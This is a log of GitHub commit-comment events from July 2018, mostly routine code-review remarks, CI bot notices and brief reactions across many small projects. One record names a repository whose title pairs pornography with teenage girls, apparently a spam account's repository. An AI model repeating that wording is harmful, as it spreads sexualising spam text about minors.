{"id":"8000707106","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/amodem"},"payload":{"comment":{"id":29793976,"position":null,"line":null,"path":null,"commit_id":"c3cefee85fd4daa5a31b9e73ead0bb1f882b1e58","created_at":"2018-07-22T19:08:13Z","updated_at":"2018-07-22T19:08:13Z","author_association":"OWNER","body":"https://github.com/romanz/amodem/pull/34#issuecomment-406884932"}},"created_at":"2018-07-22T19:08:13Z"}
{"id":"8000708258","type":"CommitCommentEvent","actor":{"login":"GinoHereIam"},"repo":{"name":"MadBee1/Word_Count_Tool"},"payload":{"comment":{"id":29793977,"position":81,"line":81,"path":"src/WordCountPackage/WordCount.java","commit_id":"3b011362da9f51ba81dba8ebfc3d86226cc4ca2c","created_at":"2018-07-22T19:09:05Z","updated_at":"2018-07-22T19:09:05Z","author_association":"NONE","body":"Words can also being separated by return carriers like \\n (Linux environment) and \\r\\n (Windows environment) or even tabulator might be possible with \\t.\r\n`E.g. My Word\\n in new line.`"}},"created_at":"2018-07-22T19:09:05Z"}
{"id":"8000708365","type":"CommitCommentEvent","actor":{"login":"Daixiaoxiang"},"repo":{"name":"MrMEEE/bumblebee-Old-and-abbandoned"},"payload":{"comment":{"id":29793978,"position":null,"line":null,"path":null,"commit_id":"a047be85247755cdbe0acce6f1dafc8beb84f2ac","created_at":"2018-07-22T19:09:10Z","updated_at":"2018-07-22T19:09:10Z","author_association":"NONE","body":"天哪 "}},"created_at":"2018-07-22T19:09:10Z"}
{"id":"8000708899","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"mykulyak/warsawjs-workshop-22-project"},"payload":{"comment":{"id":29793979,"position":null,"line":null,"path":null,"commit_id":"7a552d2f11f5b06fc6a394ecb3ef9dbbdbd86ce2","created_at":"2018-07-22T19:09:35Z","updated_at":"2018-07-22T19:09:35Z","author_association":"NONE","body":"😄 "}},"created_at":"2018-07-22T19:09:35Z"}
{"id":"8000709157","type":"CommitCommentEvent","actor":{"login":"stevezhengshiqi"},"repo":{"name":"stevezhengshiqi/XiaoMi-Pro"},"payload":{"comment":{"id":29793980,"position":null,"line":null,"path":null,"commit_id":"adb9cdb4d446a184ed0b8c94af34a6ee5cb01872","created_at":"2018-07-22T19:09:46Z","updated_at":"2018-07-22T19:09:46Z","author_association":"OWNER","body":"@javmain I think it's about _DSM method can't be called twice. The _DSM methods(in _SB.PCI0.XHC scope) in SSDT-XHC.aml and SSDT-PCIList.aml conflict with each other."}},"created_at":"2018-07-22T19:09:46Z"}
{"id":"8000714037","type":"CommitCommentEvent","actor":{"login":"songgao"},"repo":{"name":"keybase/kbfs"},"payload":{"comment":{"id":29793985,"position":17,"line":39,"path":"libhttpserver/content_type_utils.go","commit_id":"445a303835939a4dd65d8de784ac0e402fc707dd","created_at":"2018-07-22T19:13:25Z","updated_at":"2018-07-22T19:13:25Z","author_association":"MEMBER","body":"I looks like the first case could have been merged into `default`. Did you separate it out in case two different mime types were in `ty`? If so, perhaps it's worth a comment."}},"created_at":"2018-07-22T19:13:25Z"}
{"id":"8000714164","type":"CommitCommentEvent","actor":{"login":"sactrom"},"repo":{"name":"sactrom/Pagina-de-fotografia"},"payload":{"comment":{"id":29793986,"position":null,"line":null,"path":null,"commit_id":"9f01ce3d3365badb469602d4e3a212b0afad5c5e","created_at":"2018-07-22T19:13:30Z","updated_at":"2018-07-22T19:13:30Z","author_association":"OWNER","body":"Estructura básica de inicio "}},"created_at":"2018-07-22T19:13:30Z"}
{"id":"8000716087","type":"CommitCommentEvent","actor":{"login":"kalarlayhth"},"repo":{"name":"omerbaror4/rabbit-pornography-video-teenage-girls"},"payload":{"comment":{"id":29793989,"position":null,"line":null,"path":null,"commit_id":"88b155826fe0587259bb086b900faadfd347b1f3","created_at":"2018-07-22T19:14:51Z","updated_at":"2018-07-22T19:14:51Z","author_association":"NONE","body":"88b1558"}},"created_at":"2018-07-22T19:14:51Z"}
{"id":"8000716473","type":"CommitCommentEvent","actor":{"login":"LaetitiaDhont"},"repo":{"name":"ThersiquelG/BatailleNavalTest"},"payload":{"comment":{"id":29793991,"position":null,"line":null,"path":null,"commit_id":"687a11d5fe7f21429e2e055b18e4e98a2faa587c","created_at":"2018-07-22T19:15:10Z","updated_at":"2018-07-22T19:15:10Z","author_association":"NONE","body":"Very impressive !! "}},"created_at":"2018-07-22T19:15:10Z"}
{"id":"8000716996","type":"CommitCommentEvent","actor":{"login":"TRO-shahriar"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29793994,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-22T19:15:32Z","updated_at":"2018-07-22T19:15:32Z","author_association":"NONE","body":"https://www.linkedin.com/in/shahriar-tanvir-8b0049165\r\nhttps://novoresume.com/editor/resume/b863f770-8de0-11e8-90d3-a3017d59d63e"}},"created_at":"2018-07-22T19:15:32Z"}
{"id":"8000717433","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29793995,"position":null,"line":null,"path":null,"commit_id":"18a21bfe569a1ed582c374995b25f43aa8a934fd","created_at":"2018-07-22T19:15:52Z","updated_at":"2018-07-22T19:15:52Z","author_association":"OWNER","body":"Following #34"}},"created_at":"2018-07-22T19:15:52Z"}
{"id":"8000719261","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29793997,"position":null,"line":null,"path":null,"commit_id":"ea30584b2aa2b605e01dbca1cc30f3fb136b990a","created_at":"2018-07-22T19:17:16Z","updated_at":"2018-07-22T19:17:16Z","author_association":"CONTRIBUTOR","body":"@ondrejmirtes Please reconsider removing it.\r\n"}},"created_at":"2018-07-22T19:17:16Z"}
{"id":"8000719546","type":"CommitCommentEvent","actor":{"login":"nathan-fiscaletti"},"repo":{"name":"nathan-fiscaletti/ipstackgeo-php"},"payload":{"comment":{"id":29793999,"position":14,"line":14,"path":"tests/GeoLookupTest.php","commit_id":"c4df456bde7be833ed02d5e6ce08610ff61b0ccc","created_at":"2018-07-22T19:17:32Z","updated_at":"2018-07-22T19:17:32Z","author_association":"OWNER","body":"It is a real key, however it's with their free plan so I'm not incredibly worried about someone stealing it and abusing it. I'll definitely look into those though."}},"created_at":"2018-07-22T19:17:32Z"}
{"id":"8000724689","type":"CommitCommentEvent","actor":{"login":"blacknode"},"repo":{"name":"Pryancito/zeusircd"},"payload":{"comment":{"id":29794004,"position":null,"line":null,"path":null,"commit_id":"05fa1b73707774834105c428ba08576259b4c34d","created_at":"2018-07-22T19:21:25Z","updated_at":"2018-07-22T19:21:25Z","author_association":"COLLABORATOR","body":"Test tool"}},"created_at":"2018-07-22T19:21:25Z"}
{"id":"8000735405","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"donotcare/bookstore-spring"},"payload":{"comment":{"id":29794025,"position":11,"line":12,"path":"src/main/java/ru/otus/bookstore/core/AbstractNamedEntityDao.java","commit_id":"9f31c52fbd8303b5edb99b15fa45666dc0a92541","created_at":"2018-07-22T19:29:26Z","updated_at":"2018-07-22T19:29:26Z","author_association":"NONE","body":"По хорошему этот класс теперь заменяется EmtityManger-ом и он особо не нужен.."}},"created_at":"2018-07-22T19:29:26Z"}
{"id":"8000736361","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29794027,"position":null,"line":null,"path":null,"commit_id":"ad6480961080f80a455b2394f27b02935a2ded52","created_at":"2018-07-22T19:30:09Z","updated_at":"2018-07-22T19:30:09Z","author_association":"NONE","body":"On master (without the one-line patch) I get this:\r\n```\r\nDirect leak of 20000 byte(s) in 1 object(s) allocated from:\r\n    #0 0x7f0836d73219 in __interceptor_realloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cc:105\r\n    #1 0x55d33ec46fbb in ga_grow …/Vcs/vim/src/misc2.c:2099\r\n    #2 0x55d33eb425a5 in script_line_start …/Vcs/vim/src/ex_cmds2.c:5050\r\n    #3 0x55d33eb42f1b in getsourceline …/Vcs/vim/src/ex_cmds2.c:4805\r\n    #4 0x55d33ee53c65 in ex_function …/Vcs/vim/src/userfunc.c:2125\r\n    #5 0x55d33eb68ca3 in do_one_cmd …/Vcs/vim/src/ex_docmd.c:2886\r\n    #6 0x55d33eb68ca3 in do_cmdline …/Vcs/vim/src/ex_docmd.c:1040\r\n    #7 0x55d33eb43f5e in do_source …/Vcs/vim/src/ex_cmds2.c:4571\r\n    #8 0x55d33eb44cf0 in source_callback …/Vcs/vim/src/ex_cmds2.c:3437\r\n    #9 0x55d33eb40c4d in do_in_path …/Vcs/vim/src/ex_cmds2.c:3542\r\n    #10 0x55d33eb41112 in do_in_path_and_pp …/Vcs/vim/src/ex_cmds2.c:3602\r\n    #11 0x55d33eb41295 in source_in_path …/Vcs/vim/src/ex_cmds2.c:3661\r\n    #12 0x55d33eb412c3 in source_runtime …/Vcs/vim/src/ex_cmds2.c:3652\r\n    #13 0x55d33eb4160c in ex_runtime …/Vcs/vim/src/ex_cmds2.c:3431\r\n    #14 0x55d33eb68ca3 in do_one_cmd …/Vcs/vim/src/ex_docmd.c:2886\r\n    #15 0x55d33eb68ca3 in do_cmdline …/Vcs/vim/src/ex_docmd.c:1040\r\n    #16 0x55d33eadd964 in ex_execute …/Vcs/vim/src/eval.c:8194\r\n    #17 0x55d33eb68ca3 in do_one_cmd …/Vcs/vim/src/ex_docmd.c:2886\r\n    #18 0x55d33eb68ca3 in do_cmdline …/Vcs/vim/src/ex_docmd.c:1040\r\n    #19 0x55d33ee589ff in call_user_func …/Vcs/vim/src/userfunc.c:953\r\n    #20 0x55d33ee589ff in call_func …/Vcs/vim/src/userfunc.c:1449\r\n    #21 0x55d33ee5a09f in get_func_tv …/Vcs/vim/src/userfunc.c:454\r\n    #22 0x55d33ee5ae29 in ex_call …/Vcs/vim/src/userfunc.c:3109\r\n    #23 0x55d33eb68ca3 in do_one_cmd …/Vcs/vim/src/ex_docmd.c:2886\r\n    #24 0x55d33eb68ca3 in do_cmdline …/Vcs/vim/src/ex_docmd.c:1040\r\n    #25 0x55d33eba1299 in apply_autocmds_group …/Vcs/vim/src/fileio.c:9692\r\n    #26 0x55d33eba30c8 in apply_autocmds …/Vcs/vim/src/fileio.c:9205\r\n    #27 0x55d33ecd11f0 in did_set_string_option …/Vcs/vim/src/option.c:7713\r\n    #28 0x55d33ecd9972 in do_set …/Vcs/vim/src/option.c:5215\r\n    #29 0x55d33eb4b83f in ex_set …/Vcs/vim/src/ex_docmd.c:12261\r\n    #30 0x55d33eb68ca3 in do_one_cmd …/Vcs/vim/src/ex_docmd.c:2886\r\n    #31 0x55d33eb68ca3 in do_cmdline …/Vcs/vim/src/ex_docmd.c:1040\r\n    #32 0x55d33eadd964 in ex_execute …/Vcs/vim/src/eval.c:8194\r\n    #33 0x55d33eb68ca3 in do_one_cmd …/Vcs/vim/src/ex_docmd.c:2886\r\n    #34 0x55d33eb68ca3 in do_cmdline …/Vcs/vim/src/ex_docmd.c:1040\r\n    #35 0x55d33ee589ff in call_user_func …/Vcs/vim/src/userfunc.c:953\r\n    #36 0x55d33ee589ff in call_func …/Vcs/vim/src/userfunc.c:1449\r\n    #37 0x55d33ee5a09f in get_func_tv …/Vcs/vim/src/userfunc.c:454\r\n```\r\n"}},"created_at":"2018-07-22T19:30:09Z"}
{"id":"8000737344","type":"CommitCommentEvent","actor":{"login":"ayakauleu"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29794033,"position":9,"line":9,"path":"src/lesson4/Homework2.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T19:30:48Z","updated_at":"2018-07-22T19:30:48Z","author_association":"OWNER","body":"тут для каждого элемента arr[i] смотрю предыдущие и зануляю его, если хоть один предыдущий совпал - то arr[i] уже не нужен и дальше смотреть нет смысла - зануляем и break, идем на i+1. Проверил например на {1, 2, 3, 5, 5, 5, 2, 3, 3, 3} - код работает."}},"created_at":"2018-07-22T19:30:48Z"}
{"id":"8000739508","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"donotcare/bookstore-spring"},"payload":{"comment":{"id":29794035,"position":15,"line":16,"path":"src/main/java/ru/otus/bookstore/core/AbstractNamedEntityDao.java","commit_id":"9f31c52fbd8303b5edb99b15fa45666dc0a92541","created_at":"2018-07-22T19:32:26Z","updated_at":"2018-07-22T19:32:26Z","author_association":"NONE","body":"А это тогда уж убрать."}},"created_at":"2018-07-22T19:32:26Z"}
{"id":"8000741066","type":"CommitCommentEvent","actor":{"login":"ayakauleu"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29794037,"position":23,"line":23,"path":"src/lesson4/Homework3.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T19:33:39Z","updated_at":"2018-07-22T19:33:39Z","author_association":"OWNER","body":"тут хотя бы в одном массиве будет хотя бы один элемент, поэтому 1-я итерация цикла всегда имеет место - вот моя логика для do-while"}},"created_at":"2018-07-22T19:33:39Z"}
{"id":"8000741992","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29794038,"position":null,"line":null,"path":null,"commit_id":"158565054695b0d61906ed739d18b3a1638e2cd6","created_at":"2018-07-22T19:34:23Z","updated_at":"2018-07-22T19:34:23Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-256](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-256).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-256-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-22T19:34:23Z"}
{"id":"8000742198","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":29794040,"position":null,"line":null,"path":null,"commit_id":"9331a6b40eb53a2c3703cc4f3449168169a2086d","created_at":"2018-07-22T19:34:33Z","updated_at":"2018-07-22T19:34:33Z","author_association":"MEMBER","body":"The problem is that we turn `idx([a,b],c)` into `a^(1-c)*b^c`, which is usually a good thing, but when `[a,b]` is `[1,0]` we get `0^c`, which becomes `0` even when `c` is a variable."}},"created_at":"2018-07-22T19:34:33Z"}
{"id":"8000743050","type":"CommitCommentEvent","actor":{"login":"kalarlayhth"},"repo":{"name":"PohanYang/App_Identify-Porn-video"},"payload":{"comment":{"id":29794043,"position":null,"line":null,"path":null,"commit_id":"611a6afe18f6ef172f2adfc8f3af2c33fa7579c6","created_at":"2018-07-22T19:35:10Z","updated_at":"2018-07-22T19:35:10Z","author_association":"NONE","body":"611a6af"}},"created_at":"2018-07-22T19:35:10Z"}
{"id":"8000743060","type":"CommitCommentEvent","actor":{"login":"ayakauleu"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29794044,"position":12,"line":12,"path":"src/lesson4/Homework4.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T19:35:11Z","updated_at":"2018-07-22T19:35:11Z","author_association":"OWNER","body":"не знаю точно, ссылка на некий двухмерный массив, но код вроде рабочий )"}},"created_at":"2018-07-22T19:35:11Z"}
{"id":"8000743934","type":"CommitCommentEvent","actor":{"login":"5HT"},"repo":{"name":"groupoid/groupoid.space"},"payload":{"comment":{"id":29794048,"position":null,"line":null,"path":null,"commit_id":"1cc4aec9d0d9d770a1c55bf0db5dfd69571b1649","created_at":"2018-07-22T19:35:54Z","updated_at":"2018-07-22T19:35:54Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-22T19:35:54Z"}
{"id":"8000744644","type":"CommitCommentEvent","actor":{"login":"DataScienceAR"},"repo":{"name":"DataScienceAR/RClass"},"payload":{"comment":{"id":29794052,"position":null,"line":null,"path":null,"commit_id":"518cab951a0b149db768d9d5fac7eca873064d2b","created_at":"2018-07-22T19:36:26Z","updated_at":"2018-07-22T19:36:26Z","author_association":"OWNER","body":"file"}},"created_at":"2018-07-22T19:36:26Z"}
{"id":"8000745360","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"donotcare/bookstore-spring"},"payload":{"comment":{"id":29794054,"position":42,"line":36,"path":"src/main/java/ru/otus/bookstore/book/Book.java","commit_id":"9f31c52fbd8303b5edb99b15fa45666dc0a92541","created_at":"2018-07-22T19:36:57Z","updated_at":"2018-07-22T19:36:57Z","author_association":"NONE","body":"ВОт кстати setId теперь не нужен. Впрочем как и id  в параметре конструктора."}},"created_at":"2018-07-22T19:36:57Z"}
{"id":"8000747079","type":"CommitCommentEvent","actor":{"login":"thomasrudin"},"repo":{"name":"thomasrudin-mt/missions"},"payload":{"comment":{"id":29794057,"position":null,"line":null,"path":null,"commit_id":"35516a35b6b6b1f6cfe9a5fbd8e386d13562fe19","created_at":"2018-07-22T19:38:18Z","updated_at":"2018-07-22T19:38:18Z","author_association":"NONE","body":"it's part of a major rewrite i'm planning. The point is to allow the player to create their own missions in the end. I'm still getting used to the whole formspec stuff :)"}},"created_at":"2018-07-22T19:38:18Z"}
{"id":"8000748582","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29794061,"position":6,"line":40,"path":"code-review/ProfileView.js","commit_id":"69df7db14740dbf04763882089049eb05a0b2b91","created_at":"2018-07-22T19:39:26Z","updated_at":"2018-07-22T19:39:26Z","author_association":"OWNER","body":"Maybe it would be better to convert these 'if' into a 'switch' ? So we could see all the cases clearer and if we grow in options, the 'switch' would be faster."}},"created_at":"2018-07-22T19:39:26Z"}
{"id":"8000749230","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29794062,"position":null,"line":null,"path":null,"commit_id":"93a65dfb9438e4721fc209b18e61aef05cbd6098","created_at":"2018-07-22T19:39:52Z","updated_at":"2018-07-22T19:39:52Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#pr-45](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#pr-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-45-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-22T19:39:52Z"}
{"id":"8000750391","type":"CommitCommentEvent","actor":{"login":"ayakauleu"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29794063,"position":16,"line":16,"path":"src/lesson4/Homework4.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T19:40:39Z","updated_at":"2018-07-22T19:40:39Z","author_association":"OWNER","body":"да, конечно, тут так намного лучше"}},"created_at":"2018-07-22T19:40:39Z"}
{"id":"8000750925","type":"CommitCommentEvent","actor":{"login":"DiR3Wolf"},"repo":{"name":"snoopyjoe/plugin.video.psvue"},"payload":{"comment":{"id":29794065,"position":null,"line":null,"path":null,"commit_id":"c914b2fc5b504881b87a8f0f7985eda4c7bc20ee","created_at":"2018-07-22T19:41:02Z","updated_at":"2018-07-22T19:41:02Z","author_association":"NONE","body":"@snoopyjoe, ok, I was able to reproduce the myDVR issue again. I was trying to watch the replay of today's F1 race. the showed ended at 8am PST and I was trying to watch it at 9:30am PST. When I used the kodi repo version of the addon, I think it is 2018.3.24, I can watch the whole 2 hours race without no issues. However, when using the latest Erack's repo version from July (same when I did with your latest version 21 days ago) I get the error: Opps, yoyr episode of F1 has not aired yet (when in fact I just watched it). So it is noon, and I still get the error. Here is the log https://pastebin.com/y3iXnRMW  "}},"created_at":"2018-07-22T19:41:02Z"}
{"id":"8000752386","type":"CommitCommentEvent","actor":{"login":"kalarlayhth"},"repo":{"name":"DedSecInside/TorBot"},"payload":{"comment":{"id":29794070,"position":null,"line":null,"path":null,"commit_id":"a89409b3a2fdd59f29b5cb2d161f683e8c87b6cd","created_at":"2018-07-22T19:42:04Z","updated_at":"2018-07-22T19:42:04Z","author_association":"NONE","body":"a89409b"}},"created_at":"2018-07-22T19:42:04Z"}
{"id":"8000752640","type":"CommitCommentEvent","actor":{"login":"robertkeech"},"repo":{"name":"robertkeech/QuickEditor"},"payload":{"comment":{"id":29794071,"position":null,"line":null,"path":null,"commit_id":"c6874ad967d87cc6e341fae20c90afa93d84e592","created_at":"2018-07-22T19:42:16Z","updated_at":"2018-07-22T19:42:16Z","author_association":"OWNER","body":"Accepted"}},"created_at":"2018-07-22T19:42:16Z"}
{"id":"8000755397","type":"CommitCommentEvent","actor":{"login":"ayakauleu"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29794077,"position":16,"line":16,"path":"src/lesson6/Rectangle.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T19:44:04Z","updated_at":"2018-07-22T19:44:04Z","author_association":"OWNER","body":"моя логика в сокращении - я читал например у Страуструпа в С++, что внутри функции или небольшого класса соответственно локальные переменные или поля можно называть коротко, т.к. это понятно из контекста, а код приобретает лаконичность. Вот сами имена классов или методов не сокращаем, тк это то что идет другим программистам команды. Возможно я неправ. тут lt - left top, rb - right bottom. "}},"created_at":"2018-07-22T19:44:04Z"}
{"id":"8000760301","type":"CommitCommentEvent","actor":{"login":"TRO-shahriar"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29794082,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-22T19:47:37Z","updated_at":"2018-07-22T19:47:37Z","author_association":"NONE","body":"https://www.linkedin.com/in/shahriar-tanvir-8b0049165\r\nhttps://novoresume.com/editor/resume/b863f770-8de0-11e8-90d3-a3017d59d63e"}},"created_at":"2018-07-22T19:47:37Z"}
{"id":"8000762024","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"grshane/strik3"},"payload":{"comment":{"id":29794083,"position":null,"line":null,"path":null,"commit_id":"e2af9718bca061633107f216e6707830769a0428","created_at":"2018-07-22T19:49:02Z","updated_at":"2018-07-22T19:49:02Z","author_association":"OWNER","body":"Created multidev environment [strik3#ci-7](https://dashboard.pantheon.io/sites/8745c3dd-7938-4b3e-88ab-edc9518ad49b#ci-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-7-strik3.pantheonsite.io/)"}},"created_at":"2018-07-22T19:49:02Z"}
{"id":"8000765135","type":"CommitCommentEvent","actor":{"login":"Dharani-abss"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29794084,"position":null,"line":null,"path":null,"commit_id":"4c3cbe3df574a8531eca3f5722518fad3c0af9ed","created_at":"2018-07-22T19:51:20Z","updated_at":"2018-07-22T19:51:20Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GH - first shot](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T19:51:20Z"}
{"id":"8000765802","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29794085,"position":13,"line":28,"path":"code-review/steps.js","commit_id":"69df7db14740dbf04763882089049eb05a0b2b91","created_at":"2018-07-22T19:51:50Z","updated_at":"2018-07-22T19:51:50Z","author_association":"OWNER","body":"The steps 'When' are shorts and very well defined. It would be great if we did the same in 'Then' methods. Maybe moving the actions for the 'ItemDetailView' and 'ProfileView' models. So we can call these methods making the reading more intuitive and clean. What do you think?"}},"created_at":"2018-07-22T19:51:50Z"}
{"id":"8000767804","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29794087,"position":31,"line":31,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/Flights/FlightsFinder.java","commit_id":"6e9cc4b744c77ca49e29c295285863fc53741d4f","created_at":"2018-07-22T19:53:20Z","updated_at":"2018-07-22T19:53:20Z","author_association":"NONE","body":"Dodawane jest tylko miasto a powinny być dodane dwa loty - lot początkowy i końcowy"}},"created_at":"2018-07-22T19:53:20Z"}
{"id":"8000768143","type":"CommitCommentEvent","actor":{"login":"divinity76"},"repo":{"name":"ethereum-mining/ethminer"},"payload":{"comment":{"id":29794088,"position":null,"line":null,"path":null,"commit_id":"ae9585e7fdb1fe9c477f5ac8e87022a05194d610","created_at":"2018-07-22T19:53:36Z","updated_at":"2018-07-22T19:53:36Z","author_association":"CONTRIBUTOR","body":"what is the c_defaultGlobalWorkSizeMultiplier thing about?"}},"created_at":"2018-07-22T19:53:36Z"}
{"id":"8000768170","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29794089,"position":25,"line":25,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/Flights/FlightsFinder.java","commit_id":"6e9cc4b744c77ca49e29c295285863fc53741d4f","created_at":"2018-07-22T19:53:36Z","updated_at":"2018-07-22T19:53:36Z","author_association":"NONE","body":"Powinna to być lista lotów a nie lista Stringów"}},"created_at":"2018-07-22T19:53:36Z"}
{"id":"8000770486","type":"CommitCommentEvent","actor":{"login":"Lukas0907"},"repo":{"name":"nblock/feeds"},"payload":{"comment":{"id":29794091,"position":41,"line":41,"path":"feeds/spiders/gnucash_org.py","commit_id":"e55b0d5c21ac91e11e67a68cb2e85ea009829da0","created_at":"2018-07-22T19:55:16Z","updated_at":"2018-07-22T19:55:16Z","author_association":"COLLABORATOR","body":"IMHO it's not necessary to create a request for every entry since they all are on one page. However, since we cache it doesn't really matter."}},"created_at":"2018-07-22T19:55:16Z"}
{"id":"8000771302","type":"CommitCommentEvent","actor":{"login":"Lukas0907"},"repo":{"name":"nblock/feeds"},"payload":{"comment":{"id":29794094,"position":31,"line":31,"path":"feeds/spiders/gnucash_org.py","commit_id":"e55b0d5c21ac91e11e67a68cb2e85ea009829da0","created_at":"2018-07-22T19:55:53Z","updated_at":"2018-07-22T19:55:53Z","author_association":"COLLABORATOR","body":"\"./\" is actually redundant."}},"created_at":"2018-07-22T19:55:53Z"}
{"id":"8000771853","type":"CommitCommentEvent","actor":{"login":"Lukas0907"},"repo":{"name":"nblock/feeds"},"payload":{"comment":{"id":29794097,"position":17,"line":17,"path":"feeds/spiders/gnucash_org.py","commit_id":"e55b0d5c21ac91e11e67a68cb2e85ea009829da0","created_at":"2018-07-22T19:56:14Z","updated_at":"2018-07-22T19:56:14Z","author_association":"COLLABORATOR","body":"Just use \"dont_filter=True\" when making a request."}},"created_at":"2018-07-22T19:56:14Z"}
{"id":"8000773189","type":"CommitCommentEvent","actor":{"login":"melissabphd"},"repo":{"name":"melissabphd/machine-learning"},"payload":{"comment":{"id":29794099,"position":null,"line":null,"path":null,"commit_id":"ca5cd2a577a57c6172b6a969bb6b974869c40ed4","created_at":"2018-07-22T19:57:16Z","updated_at":"2018-07-22T19:57:16Z","author_association":"OWNER","body":"Using personality data to predict drug use, 4 different classifier models (one Notebook)"}},"created_at":"2018-07-22T19:57:16Z"}
{"id":"8000774343","type":"CommitCommentEvent","actor":{"login":"MRTHAKER"},"repo":{"name":"MRTHAKER/android_device_zuk_z2_plus"},"payload":{"comment":{"id":29794101,"position":null,"line":null,"path":null,"commit_id":"aa4408da5d0c3cec3405700f21fb2a0f6724d195","created_at":"2018-07-22T19:58:08Z","updated_at":"2018-07-22T19:58:08Z","author_association":"OWNER","body":"https://transfer.sh/ZnWcG/media_profiles_V1_0.xml"}},"created_at":"2018-07-22T19:58:08Z"}
{"id":"8000774655","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29794103,"position":4,"line":77,"path":"code-review/ProfileView.js","commit_id":"632c02caf4788f4620301e5dd55b32f9fb0ed33a","created_at":"2018-07-22T19:58:20Z","updated_at":"2018-07-22T19:58:20Z","author_association":"OWNER","body":"I'm not sure, but I think this is a way of call methods from elements by reference. So we can have only one method to check if is visible and click it."}},"created_at":"2018-07-22T19:58:20Z"}
{"id":"7999477045","type":"CommitCommentEvent","actor":{"login":"Claudinealexandre30"},"repo":{"name":"flickr/yakbak"},"payload":{"comment":{"id":29790732,"position":1,"line":1,"path":".eslintrc.js","commit_id":"2c5288d7a1e02d5019e0a83fa0c9654ade839c75","created_at":"2018-07-22T02:00:12Z","updated_at":"2018-07-22T02:00:12Z","author_association":"NONE","body":"B"}},"created_at":"2018-07-22T02:00:12Z"}
{"id":"7999478288","type":"CommitCommentEvent","actor":{"login":"Spiral11"},"repo":{"name":"Spiral11/docker-zen-node"},"payload":{"comment":{"id":29790737,"position":null,"line":null,"path":null,"commit_id":"2034a7e28f0a0253c8079ff171335c7679f7a4e3","created_at":"2018-07-22T02:01:29Z","updated_at":"2018-07-22T02:01:29Z","author_association":"OWNER","body":"Change 4gb -> 2gb Swap\r\nAdd shortcut commands to .bashrc"}},"created_at":"2018-07-22T02:01:29Z"}
